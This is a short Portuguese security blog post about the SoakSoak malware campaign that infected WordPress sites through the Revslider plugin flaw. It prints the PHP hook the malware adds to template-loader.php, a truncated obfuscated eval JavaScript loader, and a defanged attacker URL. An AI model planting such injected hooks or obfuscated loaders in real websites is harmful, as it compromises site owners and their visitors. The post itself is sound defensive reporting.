Mais de 100000 sites WordPress infetados

SoakSoak-RU-Blacklisted

O Google bloqueou ontem cerca de 11.000 domínios com a última campanha de malware SoakSoak.
A empresa Sucuri suspeita que os valores sejam bem superiores e que estão relacionados com a vulnerabilidade no plugin para WordPress Revslider.

O SoakSoak modifica o seguinte ficheiro do WordPress wp-includes/template-loader.php e inclui o seguinte código:

function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

Isto faz com que o swobject.js seja executado em todas as páginas do blog que inclui o seguinte malware:

eval(decodeURIComponent
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Este código JavaScript ofuscado, carrega o ficheiro malicioso hxxp://soaksoak.ru/xteas/code

Contatei algumas empresas de alojamento em Portugal, que mencionaram a presença deste malware em algumas das suas contas de clientes mas que a situação encontra-se controlada.

Achaste interessante? Partilha!
    Analista de segurança web com vários anos de experiência. Fundador do projeto WebSegura.net. Reconhecido publicamente, por divulgação de vulnerabilidades, por empresas como a Google, Adobe, eBay, Microsoft, Yahoo, Panda Security, AVG, Kaspersky, McAfee, Hootsuite e outros. Colabora regularmente com a comunicação social em temas relacionados com a segurança de informação.

    Que tal participar com o seu comentário?